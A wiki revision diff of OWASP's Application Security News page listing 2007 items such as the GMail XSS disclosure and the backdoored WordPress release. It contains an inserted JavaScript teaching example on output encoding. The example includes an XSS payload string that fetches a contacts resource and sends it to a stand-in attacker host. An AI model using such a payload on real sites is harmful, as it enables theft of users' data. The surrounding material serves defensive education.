(14 intermediate revisions by 5 users not shown) |
− | <!-- please add stories to the main Application Security News page --> | + | <IfLanguage Is="en"> |
| + | This news feed is moderated by OWASP and will feature high-quality posts focused on application security that advance the field, provide useful insight, or are useful educational resources. |
| + | </IfLanguage> |
| + | <IfLanguage Is="es"> |
| + | This news feed is moderated by OWASP and will feature high-quality posts focused on application security that advance the field, provide deep insight, or are useful educational resources. |
| + | </IfLanguage> |
| | | |
− | ; '''Mar 15 - [http://aviv.raffon.net/2007/03/14/PhishingUsingIE7LocalResourceVulnerability.aspx local IE 7 phishing hole]'''
| + | <owaspfeed/> |
− | :Provides a nice proof of concept with CNN (link at the bottom of the post). "Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users." CNET News also picked this up as a [http://news.com.com/2100-1002_3-6167410.html?part=rss&tag=2547-1_3-0-20&subj=news story].
| |
− | | |
− | ; '''Mar 14 - [http://mybeni.rootzilla.de/mybeNi/2007/gmail_information_disclosure/ GMail Information Disclosure]'''
| |
− | :A tiny XSS hole was enough to demonstrate, through AJAX/JSON, a proof-of-concept disclosure of every contact you have ever mailed. If one domain covers a lot of functionality and users, a single XSS can be devastating; remember the Google Desktop vulnerability. What is frightening is that it took Beni only about 5 minutes to find the XSS hole.
| |
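The bug class behind this item, as an added example (not code from the OWASP page or from the linked post): a page on a large origin that inserts untrusted input into HTML without encoding, next to the same render with HTML escaping. The contacts endpoint path, the attacker host and the payload string are constructed placeholders, not anything from the original report; the point is that whatever script lands in the page runs with the origin's privileges, so a same-origin XMLHttpRequest/fetch to any JSON endpoint of that domain is available to it.

```javascript
// Added example, not from the OWASP page or the linked post.
// Models the class of bug the news item describes: untrusted input reaches an
// HTML context without output encoding, so an injected script runs with the
// origin's privileges. Endpoint path, attacker host and payload are constructed.

// Vulnerable render: plain string concatenation, no output encoding.
function renderGreetingVulnerable(name) {
  return '<p>Hello, ' + name + '</p>';
}

// HTML-text-context encoder: the five characters that matter. '&' must be
// replaced first so already-encoded output is not double-encoded by later steps.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened render: same markup, encoded input.
function renderGreetingSafe(name) {
  return '<p>Hello, ' + escapeHtml(name) + '</p>';
}

// Demonstration-only detector for markup that would execute script. The real
// arbiter is the browser's parser; this only makes the two renders comparable.
function containsScriptElement(html) {
  return /<script\b|<img\b[^>]*\bonerror\s*=|<svg\b[^>]*\bonload\s*=/i.test(html);
}

// Constructed payload: once it runs on the victim origin, it reads an
// authenticated JSON resource and ships it off-site. "/contacts.json" and
// attacker.example are placeholders.
const PAYLOAD =
  '<script>fetch("/contacts.json").then(r=>r.text())' +
  '.then(t=>navigator.sendBeacon("https://attacker.example/x",t))</script>';

// Returns whether each render leaves the payload executable, plus the safe output.
function demo(input) {
  const name = input === undefined ? PAYLOAD : input;
  return {
    vulnerable: containsScriptElement(renderGreetingVulnerable(name)),
    safe: containsScriptElement(renderGreetingSafe(name)),
    safeOutput: renderGreetingSafe(name),
  };
}

console.log(demo()); // vulnerable: true, safe: false
```

The escaping here is for an HTML text context only; attribute values, URLs and script blocks each need their own encoder, which is exactly why a domain hosting many features has so many places for one such slip to occur.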
− | | |
− | ; '''Mar 8 - [http://myappsecurity.blogspot.com/search/label/reflection Anurag Agarwal's reflection series]'''
| |
− | :Anurag Agarwal maintains an interesting [http://myappsecurity.blogspot.com/ blog] on web application security. Recently he started a series of reflections on people active in this field. So far he has covered Amit Klein, RSnake, Jeremiah Grossman, Ivan Ristic and Shreeraj Shah. Lots of good pointers to web application security research of recent years!
| |
− | | |
− | ; '''Mar 2 - [http://wordpress.org/development/2007/03/upgrade-212/ WordPress (popular blog software) backdoored]'''
| |
− | :"Long story short: If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker, and you should upgrade all of your files to 2.1.2 immediately."
| |
− | | |
− | ; '''Mar 1 - [http://www.php-security.org/ the Month of PHP Bugs "formerly known as March"]'''
| |
− | :"This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core."
| |
− | | |
− | ; '''Feb 26 - [http://www.securityfocus.com/infocus/1888 Building Secure Applications: Consistent Logging]'''
| |
− | :SecurityFocus article, "This article examines the dismal state of application-layer logging as observed from the authors’ years of experience in performing source code security analysis on millions of lines of code."
| |
− | | |
− | ; [[Application Security News|Older news...]]
| |